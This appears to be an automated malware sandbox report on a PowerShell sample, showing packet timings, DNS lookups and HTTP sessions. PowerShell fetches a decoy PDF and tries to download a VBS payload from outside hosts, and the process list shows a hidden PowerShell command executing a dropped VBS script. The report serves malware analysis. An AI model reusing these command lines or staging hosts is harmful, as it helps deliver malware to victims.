                                                                                    Dec 19, 2024 12:44:30.761509895 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.761537075 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.761580944 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.790765047 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.790827990 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.790858030 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.790864944 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.790885925 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.790904999 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.815531969 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.815558910 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.815607071 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.815617085 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.815640926 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.815818071 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.844228029 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.844263077 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.844301939 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.844307899 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.844343901 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.844358921 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.948739052 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.948769093 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.948808908 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.948820114 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.948863029 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.948889017 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.966922045 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.966952085 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.967004061 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.967039108 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.967061996 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.967084885 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.986330986 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.986358881 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.986414909 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.986442089 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.986455917 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.986484051 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.005815983 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.005841017 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.005923986 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.005953074 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.005995989 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.023442984 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.023464918 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.023525000 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.023540974 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.023582935 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.042368889 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.042397976 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.042443991 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.042470932 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.042490005 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.042509079 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.127589941 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.127609015 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.127693892 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.127722979 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.127763033 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.141202927 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.141222954 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.141278982 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.141307116 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.141325951 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.141339064 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.152599096 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.152615070 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.152678013 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.152704000 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.152743101 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.164603949 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.164622068 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.164681911 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.164709091 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.164755106 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.176316977 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.176335096 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.176403046 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.176429987 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.176487923 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.187099934 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.187114000 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.187181950 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.187202930 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.187256098 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.198160887 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.198179007 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.198259115 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.198268890 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.198313951 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.208313942 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.208331108 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.208384037 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.208391905 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.208435059 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.321152925 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.321173906 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.321269989 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.321289062 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.321325064 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.328907967 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.328923941 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.328994036 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.329001904 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.329051018 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.335627079 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.335643053 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.335709095 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.335716963 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.335772991 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.343110085 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.343123913 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.343192101 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.343198061 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.343240023 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.350167990 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.350186110 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.350253105 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.350277901 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.350323915 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.357456923 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.357475996 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.357547045 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.357553005 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.357613087 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.365020990 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.365035057 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.365099907 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.365106106 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.365160942 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.371900082 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.371916056 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.371983051 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.371993065 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.372035980 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.513612986 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.513643026 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.513705969 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.513732910 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.513748884 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.513777971 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.519779921 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.519817114 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.519859076 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.519876957 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.519890070 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.519927979 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.527004957 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.527044058 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.527102947 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.527128935 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.527143002 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.527173996 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.534310102 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.534337997 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.534442902 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.534451962 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.534504890 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.541205883 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.541232109 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.541312933 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.541340113 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.541393042 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.548584938 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.548605919 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.548680067 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.548697948 CET44349712107.161.23.150192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 12:44:28.506200075 CET | 49774 | 53 | 192.168.2.7 | 1.1.1.1
Dec 19, 2024 12:44:28.644074917 CET | 53 | 49774 | 1.1.1.1 | 192.168.2.7
Dec 19, 2024 12:44:32.274039984 CET | 55238 | 53 | 192.168.2.7 | 1.1.1.1
Dec 19, 2024 12:44:32.527728081 CET | 53 | 55238 | 1.1.1.1 | 192.168.2.7
Dec 19, 2024 12:44:44.077353001 CET | 58484 | 53 | 192.168.2.7 | 1.1.1.1
Dec 19, 2024 12:44:57.426554918 CET | 63071 | 53 | 192.168.2.7 | 1.1.1.1
Dec 19, 2024 12:45:21.520437956 CET | 51764 | 53 | 192.168.2.7 | 1.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 12:44:28.506200075 CET | 192.168.2.7 | 1.1.1.1 | 0x3fb3 | Standard query (0) | www.astenterprises.com.pk | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:44:32.274039984 CET | 192.168.2.7 | 1.1.1.1 | 0x4cc6 | Standard query (0) | www.bluemaxxlaser.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:44:44.077353001 CET | 192.168.2.7 | 1.1.1.1 | 0xaa8a | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:44:57.426554918 CET | 192.168.2.7 | 1.1.1.1 | 0x4eea | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:45:21.520437956 CET | 192.168.2.7 | 1.1.1.1 | 0x520 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 12:44:28.644074917 CET | 1.1.1.1 | 192.168.2.7 | 0x3fb3 | No error (0) | www.astenterprises.com.pk | astenterprises.com.pk | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:44:28.644074917 CET | 1.1.1.1 | 192.168.2.7 | 0x3fb3 | No error (0) | astenterprises.com.pk | | 107.161.23.150 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:44:32.527728081 CET | 1.1.1.1 | 192.168.2.7 | 0x4cc6 | No error (0) | www.bluemaxxlaser.com | | 203.175.174.69 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:44:38.093642950 CET | 1.1.1.1 | 192.168.2.7 | 0x3114 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:44:38.093642950 CET | 1.1.1.1 | 192.168.2.7 | 0x3114 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:44:44.411576033 CET | 1.1.1.1 | 192.168.2.7 | 0xaa8a | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:44:57.565195084 CET | 1.1.1.1 | 192.168.2.7 | 0x4eea | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:45:21.658581972 CET | 1.1.1.1 | 192.168.2.7 | 0x520 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                                                    • www.astenterprises.com.pk
                                                                                    • www.bluemaxxlaser.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49723 | 203.175.174.69 | 80 | 7572 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 12:44:32.652717113 CET | 80 | OUT | GET /ms/ms.vbs HTTP/1.1
Host: www.bluemaxxlaser.com
Connection: Keep-Alive
Dec 19, 2024 12:44:34.184578896 CET | 516 | IN | HTTP/1.1 404 Not Found
Date: Thu, 19 Dec 2024 11:44:33 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49712 | 107.161.23.150 | 443 | 7572 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 11:44:29 UTC | 127 | OUT | GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
Host: www.astenterprises.com.pk
Connection: Keep-Alive
2024-12-19 11:44:30 UTC | 217 | IN | HTTP/1.1 200 OK
Connection: close
content-type: application/pdf
last-modified: Sun, 28 Jan 2024 19:03:01 GMT
accept-ranges: bytes
content-length: 871324
date: Thu, 19 Dec 2024 11:44:30 GMT
server: LiteSpeed
2024-12-19 11:44:30 UTC | 16384 | IN | Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B345
                                                                                    2024-12-19 11:44:30 UTC16384INData Raw: 65 4a 6b 65 99 59 69 a6 d1 2e 92 09 42 56 9d 76 36 de de ee 91 3f a8 5c e0 5f 5b 77 e3 3c 3f c5 d2 61 a4 01 53 f1 61 dd 5d 12 d9 1d 42 6b 0c 37 40 71 c6 94 df 77 c2 a0 a5 a4 83 70 01 dc f3 3e be 57 b4 31 5f be e0 40 10 00 be 7d bd b9 8a 65 3d 97 15 d8 04 b8 5c 83 c0 88 f9 a2 a4 2b 1d 8b 70 55 46 a6 cd 41 29 97 42 d0 b0 b5 5b 80 5f 5b f5 d6 e0 ef 6f 2d 74 8e 37 10 b5 e5 c3 3c b9 5b ad bc 99 96 36 33 b1 a6 69 37 fc a9 0a 7b 33 ca 4a 38 c3 12 33 68 6e 4d 01 21 68 4a 85 ac 39 1b 5b 71 ef bd b4 b4 0e 21 79 fb e4 89 91 a0 a1 1c ce 53 6f 85 43 bf ac 34 41 f2 de 4d 55 e1 86 b2 e5 9c 31 26 d4 b4 84 cb 69 03 84 2c 85 01 73 a7 4d 2d e0 7a f2 8e e2 62 17 d2 c3 f7 3f ee aa b0 cb 9a 6f 47 0d 3c 8c a4 4d 57 1e 62 e5 7c 8e 39 a1 2a 4a 69 e6 94 e7 00 40 5f 12 7f 7a da eb
                                                                                    Data Ascii: eJkeYi.BVv6?\_[w<?aSa]Bk7@qwp>W1_@}e=\+pUFA)B[_[o-t7<[63i7{3J83hnM!hJ9[q!ySoC4AMU1&i,sM-zb?oG<MWb|9*Ji@_z


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:1
                                                                                    Start time:06:44:17
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1"
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:06:44:17
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:06:44:19
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:6
                                                                                    Start time:06:44:31
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
                                                                                    Imagebase:0x7ff702560000
                                                                                    File size:5'641'176 bytes
                                                                                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:8
                                                                                    Start time:06:44:32
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                    Imagebase:0x7ff6c3ff0000
                                                                                    File size:3'581'912 bytes
                                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:9
                                                                                    Start time:06:44:32
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                    Imagebase:0x7ff7b4ee0000
                                                                                    File size:55'320 bytes
                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:10
                                                                                    Start time:06:44:33
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1636,i,14229449947931004828,5729457829333662264,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                    Imagebase:0x7ff6c3ff0000
                                                                                    File size:3'581'912 bytes
                                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false
